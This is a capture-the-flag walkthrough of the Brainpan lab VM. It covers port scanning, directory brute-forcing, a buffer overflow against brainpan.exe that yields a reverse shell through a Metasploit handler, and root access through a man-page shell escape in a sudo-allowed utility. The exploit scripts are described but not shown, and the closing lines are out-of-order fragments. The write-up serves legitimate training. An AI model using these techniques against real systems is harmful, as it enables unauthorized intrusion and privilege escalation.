_ _
| |__ _ __ __ _(_)_ __ _ __ __ _ _ __
| '_ \| '__/ _` | | '_ \| '_ \ / _` | '_ \
| |_) | | | (_| | | | | | |_) | (_| | | | |
|_.__/|_| \__,_|_|_| |_| .__/ \__,_|_| |_|
|_|
by superkojiman
http://www.techorganic.com
DISCLAIMER
----------
By using this virtual machine, you agree that in no event will I be liable
for any loss or damage including without limitation, indirect or
consequential loss or damage, or any loss or damage whatsoever arising
from loss of data or profits arising out of or in connection with the use
of this software.
TL;DR: If something bad happens, it's not my fault.
SETUP
-----
Brainpan has been tested and found to work on the following hypervisors:
- VMware Player 5.0.1
- VMWare Fusion 5.0
- VirtualBox 4.2.8
Import Brainpan into your preferred hypervisor and configure the network
settings to your needs. It will get an IP address via DHCP, but it's
recommended you run it within a NAT or visible to the host OS only since it
is vulnerable to attacks.
Extract archive downloaded and copy the mona.py file to OllyDBG/ImmDBG PyCommands folder.
Task 1 - Deploy the machine
Deploy attacker machine (Kali) and Brainpain machine on VirtualBox, Vmware or on a compatible emulator:
and check relative IPs:
🐲 Attacker/Kali IP: 192.168.56.7 obtained using ip a
The Brainpain VM is on the same subnet, than we do host discovery with nmap or arp-scan only in our subnet: nmap 192.168.56.0/24
Nmap scan report for 192.168.56.8
Host is up (0.00015s latency).
🎯 Target IP: 192.168.56.8
Create a directory for machine on the Desktop and a directory containing the scans with nmap.
Task 2 - Reconnaissance
su
echo "192.168.56.8 brainpain" >> /etc/hosts
mkdir -p vulnhub/brainpain
cd vulnhub/brainpain
mkdir {nmap,content,exploits,scripts}
# At the end of the room
# To clean up the last line from the /etc/hosts file
sed -i '$ d' /etc/hosts
I prefer to start recon by pinging the target, this allows us to check connectivity and get OS info.
ping -c 3 brainpain
PING brainpain (192.168.56.8) 56(84) bytes of data.
64 bytes from brainpain (192.168.56.8): icmp_seq=1 ttl=64 time=0.670 ms
64 bytes from brainpain (192.168.56.8): icmp_seq=2 ttl=64 time=0.441 ms
64 bytes from brainpain (192.168.56.8): icmp_seq=3 ttl=64 time=0.390 ms
Sending these three ICMP packets, we see that the Time To Live (TTL) is ~64 secs. this indicates that the target is a *nix system, while Windows systems usually have a TTL of 128 secs.
PORT STATE SERVICE REASON VERSION
9999/tcp open abyss? syn-ack ttl 64
| fingerprint-strings:
| NULL:
| _| _|
| _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
| _|_| _| _| _| _| _| _| _| _| _| _| _|
| _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
| [________________________ WELCOME TO BRAINPAN _________________________]
|_ ENTER THE PASSWORD
10000/tcp open http syn-ack ttl 64 SimpleHTTPServer 0.6 (Python 2.7.3)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.3
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9999-TCP:V=7.94SVN%I=7%D=12/30%Time=65906D34%P=x86_64-pc-linux-gnu%
SF:r(NULL,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\
SF:|_\|\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\
SF:x20\x20\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_
SF:\|\x20\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_
SF:\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_
SF:\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x2
SF:0_\|\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x
SF:20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x
SF:20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x
SF:20\x20\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\
SF:x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x
SF:20\x20_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINP
SF:AN\x20_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENT
SF:ER\x20THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:n\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20>>\x20");
command
result
sC
run default scripts
sV
enumerate versions
A
aggressive mode
Pn
no ping
oN
output to file with nmap formatting
We see that on port 1000 there's a web server, than we can try to open it on a browser.
and this is relative page source code:
We can see that it is a static page with only an image included.
While on port 9999 there's an hypotetic login form, but without possibility to insert input.
Now, we try to find potential hidden directory using gobuster:
gobuster dir -u http://brainpain:10000 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://brainpain:10000
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/bin (Status: 301) [Size: 0] [--> /bin/]
Progress: 199331 / 220561 (90.37%)[ERROR] Get "http://brainpain:10000/OpenDoorLogoShadow": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================
Going to it we find an interesting file exe, that we can download in locally:
Check more info about executable using command file:
file brainpan.exe
brainpan.exe: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows, 5 sections
that confirms exe windows file. Run it using windows emulator (wine):
wine brainpan.exe
Program was waiting a connection on port 9999, then we can use netcat on localhost and the same port:
nc 127.0.0.1 9999
now we can interact with login shell and insert psw (that we don't know).
Reading first tab page, after psw input we can see output that displays: [get_reply] copied 9 bytes to buffer. It means that program returns output of copied bytes to buffer and we can use it to test potential BoF vulnerability.
Task 3 - BoF Exploitation
3.1 Fuzzing
We can try to test sw using a fuzzer script in python:
Our scope is to overwrite EIP register and put into command to jump to ESP register (where we'll insert our payload/shellcode) and force execution, then we can try to put into EIP register 4 character of letter B (42 hex), using fuzzer below:
We already have control over the EIP, the next step will be to know the BADCHARS. Basically we need to know which characters are bad or invalid for the payload. These characters are those that could interfere with the execution of our payload or cause unexpected behavior.
All right, ow we need to replace the 400 C's of the ESP with our shellcode:
in the below script to prevent i've add before shellcode a sequence of NOP chars to prevent the inexact memory addresses matter. NOP sleds help align the actual shellcode to a specific memory address. In some cases, the payload needs to be aligned to a particular memory boundary for successful execution. NOP sleds provide a flexible way to achieve this alignment. Of course NOP operations will be not executed and program will pass directly to our shell code inserted into buf variable.
First to execute it, we need to listening it on the same port of shellcode IP and PORT running a multi handler on msfconsole:
Then we can run our shellcode script to brainpain machine (192.168.56.8):
python3 shellcode.py 192.168.56.8
Connection was established on port 5555, and we've obtained a reverse shell
Task 4 - Privilege Escalation
id
uid=1002(puck) gid=1002(puck) groups=1002(puck)
python -c 'import pty; pty.spawn("/bin/bash");'
puck@brainpan:/home/puck$
puck@brainpan:/home/puck$ sudo -l
sudo -l
Matching Defaults entries for puck on this host:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User puck may run the following commands on this host:
(root) NOPASSWD: /home/anansi/bin/anansi_util
We can execute /home/anansi/bin/anansi_util as root:
sudo -u root /home/anansi/bin/anansi_util
The program accepts manual option + command. Taking tentatives i can see that manual refers to linux man function. Then, i can use it to open a man page regarding a command (e.g. ls) and inserit into a !/bin/sh to became root.
sudo -u root /home/anansi/bin/anansi_util manual ls
save it, and we'll obtain root permissions!
or sudo apt install ollydbg
In alternative you can install others sw such as: and execute it using Wine on Linux OS or on (in this case you should transfer the executable brainpain.exe).
Download Mona modules from here:
and we find an interesting path:
There are several ways to create them, we can go to and copy the badchars into our script.
